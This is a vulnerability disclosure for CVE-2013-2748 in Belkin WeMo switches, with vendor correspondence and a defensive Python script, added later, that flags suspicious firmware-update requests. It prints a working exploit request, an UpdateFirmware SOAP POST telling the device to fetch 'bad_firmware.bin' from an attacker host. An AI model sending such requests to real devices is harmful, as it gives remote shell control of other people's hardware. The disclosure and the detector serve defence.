# Exploit Title: Belkin Wemo Arbitrary Firmware Vulnerability
# Date: 4/3/13
# Exploit Author: Daniel Buentello
# Vendor Homepage: http://www.belkin.com/us/wemo
# Version: Any version prior to WeMo_US_2.00.2176.PVT
# CVE : CVE-2013-2748

Hello, I'm independently working with Mitre and Belkin on this matter so please disregard my naiveness. Several months ago I discovered a vulnerability on the Belkin WeMo light switch that would allow arbitrary firmware to be uploaded, resulting in remote shell access. Here is a YouTube link to a PoC video I made:

https://www.youtube.com/watch?v=BcW2q0aHOFo

I was finally able to reach Belkin and worked with them on patching the vulnerability. I recently heard back from them and here is the correspondence:

Daniel,

The FW for WeMo Switch and Sensor with the security fixes for some of the issues you notified us about have shipped. The updated FW version is WeMo_US_2.00.2176.PVT and WeMo_WW_2.00.2176.PVT (worldwide version). I didn't register for CVEs for the vulns you found, as the process wasn't clear for companies outside tier 1 (Microsoft, Oracle, Apple, Adobe) type companies. We are still working on a credit page for White Hat submissions and it will probably be a few months out.

I reached out to Mitre and they assigned me a CVE and recommended I submit my code here. Here is the code which would allow someone to upload their own firmware:

POST /upnp/control/firmwareupdate1 HTTP/1.1
SOAPACTION: "urn:Belkin:service:firmwareupdate:1#UpdateFirmware"
Content-Length:
Content-Type: text/xml; charset="utf-8"
HOST: 10.0.1.8:49153
User-Agent: 07Jan20131 http://10.0.1.99/bad_firmware.bin

Mitre needs the vulnerability documented on an external site in order to add the entry into the CVE database. If needed I can forward you the PGP signed message from them. If you need anything else feel free to ask. I have copies of all correspondence between Belkin, Mitre, and myself.
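
For defenders monitoring a network with affected devices, an added example that is not part of the original submission or Belkin's code: it checks captured HTTP requests for the UpdateFirmware SOAP action shown above and reports any firmware URL whose host is outside an allowlist. The allowlist host `firmware.vendor.example` and the function names are assumptions, and the sample request is constructed from the values visible in the post.

```python
import re
from urllib.parse import urlsplit

# Assumption: the only host devices should fetch firmware from (placeholder).
TRUSTED_FIRMWARE_HOSTS = {"firmware.vendor.example"}
CONTROL_PATH = "/upnp/control/firmwareupdate1"
SOAP_ACTION = "urn:Belkin:service:firmwareupdate:1#UpdateFirmware"
TAG_RE = re.compile(r"<[^>]*>")  # drops tags together with their attributes
URL_RE = re.compile(r"https?://[^\s<>\"']+", re.I)


def parse_request(raw):
    """Split one captured HTTP request into (method, path, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.strip().split("\n")
    parts = lines[0].split()
    method, path = (parts[0].upper(), parts[1]) if len(parts) >= 2 else ("", "")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def check_firmware_update(raw, trusted=TRUSTED_FIRMWARE_HOSTS):
    """Return findings for one request; an empty list means nothing to report."""
    method, path, headers, body = parse_request(raw)
    action = headers.get("soapaction", "").strip('"')
    if method != "POST" or (path != CONTROL_PATH and action != SOAP_ACTION):
        return []
    # Look only at element text so SOAP namespace URIs in attributes are ignored.
    urls = URL_RE.findall(TAG_RE.sub(" ", body))
    if not urls:
        return ["UpdateFirmware request without a parseable firmware URL"]
    hosts = [(u, (urlsplit(u).hostname or "").lower()) for u in urls]
    return [f"UpdateFirmware points at untrusted host {h}: {u}"
            for u, h in hosts if h not in trusted]


# Constructed sample; the body carries only the values visible in the post.
SAMPLE_UNTRUSTED = (
    "POST /upnp/control/firmwareupdate1 HTTP/1.1\r\n"
    'SOAPACTION: "urn:Belkin:service:firmwareupdate:1#UpdateFirmware"\r\n'
    "HOST: 10.0.1.8:49153\r\n\r\n"
    "07Jan20131 http://10.0.1.99/bad_firmware.bin"
)
```

The check does not depend on the XML element names, so it works on both a full SOAP envelope and a body reduced to its text values.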